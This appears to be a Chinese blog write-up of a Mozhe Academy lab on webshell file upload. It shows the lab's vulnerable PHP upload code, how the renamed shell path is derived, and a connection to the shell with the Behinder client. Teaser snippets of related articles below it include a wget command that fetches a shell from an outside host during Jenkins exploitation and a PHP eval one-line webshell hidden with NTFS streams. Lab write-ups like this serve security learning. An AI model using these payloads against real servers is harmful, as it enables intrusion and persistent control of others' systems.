墨者学院WebShell文件上传分析溯源(第2题)Write

摘要:
php$path=“uploadfile/”;//上传路径$verify=$_ POST[“verify”];$时间=日期;如果{$file1=$_FILES[“filename”][“name”];$file2=$path.$time.'_'.$verify.'_'.$file1;$flag=1;}如果$result=move_uploaded_file;Ifecho“上传成功!

今天看文章看到一道比较有意思的题,复现并记录一下,友情提示,这个靶场经常经常经常出问题,如果发现路径无法访问等问题,重启解决就好~

寻找上传文件

访问提示后台,访问admin/upload.php会显示没有权限,并有一个upload1.php页面一闪而过,随后跳转到upload2.php,用burp抓包,得到上传页面
墨者学院WebShell文件上传分析溯源(第2题)Write第1张
墨者学院WebShell文件上传分析溯源(第2题)Write第2张

确定上传路径

上传之后只会显示上传路径,扫描目录也没有找到上传的文件,通过抓取upload1.php页面,发现返回了源码,现在已知处理上传的文件为upload_file.php
墨者学院WebShell文件上传分析溯源(第2题)Write第3张
通过更改cookie的uploadmd5字段,获取upload_file.php的源码
墨者学院WebShell文件上传分析溯源(第2题)Write第4张

<script language=javascript>alert('您无权限访问!');window.open('upload2.php','_top');</script>
<form enctype="multipart/form-data" action="upload_file.php" method="post"> 
Send this file: <input name="filename" type="file"> 
<input type="hidden" name="verify" value="<?php 
$path="uploadfile/";//上传路径  
$verify=$_POST["verify"];
$time=date("Ymd");
if($_FILES["filename"]["name"])  
{  
$file1=$_FILES["filename"]["name"];  
$file2 = $path.$time.'_'.$verify.'_'.$file1;  
$flag=1;  
}  
if($flag) $result=move_uploaded_file($_FILES["filename"]["tmp_name"],$file2);  
if($result) echo "上传成功!";  

?> 
"/>
<input type="submit" value="Send File"> 
</form> 

通过分析代码,发现上传上去的文件被重命名,处理代码为$file2 = $path.$time.'_'.$verify.'_'.$file1; ,将上传路径,时间,$verify,文件名进行拼接,得到20200406_375a49e245c8c9d0_ma.php,访问找到上传文件
墨者学院WebShell文件上传分析溯源(第2题)Write第5张

找到key

用冰蝎进行连接,翻目录找到key文件并查看
墨者学院WebShell文件上传分析溯源(第2题)Write第6张

免责声明:文章转载自《墨者学院WebShell文件上传分析溯源(第2题)Write》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇球性插值HFish蜜罐-基于Docker的搭建与配置下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

jenkins未授权访问/弱口令漏洞

昨天晚上面试官问到了,还没来得及看,今天又问到了,猝不及防,蓝瘦,香菇、、、 今天特此总结一下,给自己一个交代。 总述:进入后台可进行如下操作: 直接执行系统命令: println "cmd".execute().text wget下载文件getshell: println "wget http://xxxx/tools/shell.php -P /t...

【转】渗透工具包2014贺岁版发布

文章来源:http://www.52pojie.cn/forum.php?mod=viewthread&tid=232609 主体内容(根据常规渗透测试流程定制) 1.  综合扫描 2.  目录检测 3.  注入检测 4.  旁注与c段 5.  抓包改包 6.  webshell 7.  提权工具 8.  arp嗅探 7.  社会工程 8.  破...

【web端权限维持】利用ADS隐藏webshell

0X01 前言   未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell   关于ADS的介绍,就不再阐述,详见尾部参考资料。   PHP 一句话木马:<?php @eval($_POST['chopper']...

web shell

介绍: 为什么文件上传存在漏洞 上传文件时,如果服务器代码未对客户端上传的文件进行严格的验证和过滤,就容易造成 可以上传任意文件的情况,包括上传脚本文件(asp、aspx、php、jsp 等格式的文件)。 ·危害 非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本 文件,又称之为 webshell,也可将 webshell 脚本...